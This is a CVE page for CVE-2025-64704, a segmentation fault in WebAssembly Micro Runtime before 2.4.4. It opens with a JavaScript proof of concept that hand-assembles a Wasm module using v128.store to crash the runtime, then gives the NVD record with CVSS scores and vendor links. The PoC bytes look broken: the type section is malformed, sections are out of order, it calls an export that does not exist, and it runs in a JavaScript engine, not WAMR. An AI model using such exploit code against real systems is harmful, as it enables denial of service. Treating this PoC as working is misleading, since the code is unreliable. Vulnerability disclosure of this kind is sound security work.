CVE-2025-64704

(function() { // CVE-2025-64704 PoC - WAMR v128.store Segmentation Fault // This PoC demonstrates the v128.store instruction vulnerability in WAMR < 2.4.4 const wasmCode = new Uint8Array([ // Wasm Magic Number and Version 0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, // Type Section 0x01, 0x07, 0x01, 0x06, 0x01, 0x01, 0x60, 0x00, 0x01, 0x01, // Function Section 0x03, 0x02, 0x01, 0x00, // Memory Section 0x05, 0x03, 0x01, 0x00, 0x01, // Data Section (malformed data to trigger v128.store issue) 0x0b, 0x09, 0x01, 0x00, 0x41, 0x00, 0x0b, 0x01, 0x00, // Code Section 0x0a, 0x0f, 0x01, 0x0d, 0x00, 0x41, 0x00, 0x41, 0x00, 0xfd, 0x52, 0x0b // v128.store instruction (0xfd 0x52) ]); // Create WebAssembly module from PoC code const module = new WebAssembly.Module(wasmCode); const instance = new WebAssembly.Instance(module); // Attempt to trigger the vulnerability try { instance.exports.main(); } catch (e) { console.log('Potential crash or error detected:', e.message); } })(); // Note: This PoC is for educational purposes only. // Target: WAMR versions < 2.4.4 // Attack Vector: Local execution of malicious Wasm module // Impact: Segmentation fault / DoS

{"cve": {"id": "CVE-2025-64704", "sourceIdentifier": "[email protected]", "published": "2025-11-25T23:15:47.583", "lastModified": "2025-12-03T18:50:20.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, WAMR is susceptible to a segmentation fault in v128.store instruction. This issue has been patched in version 2.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.4", "matchCriteriaId": "FC2929DB-4D93-47DC-BA0C-10BAE8760C2B"}]}]}], "references": [{"url": "https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-2f2p-wf5w-82qr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-2f2p-wf5w-82qr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}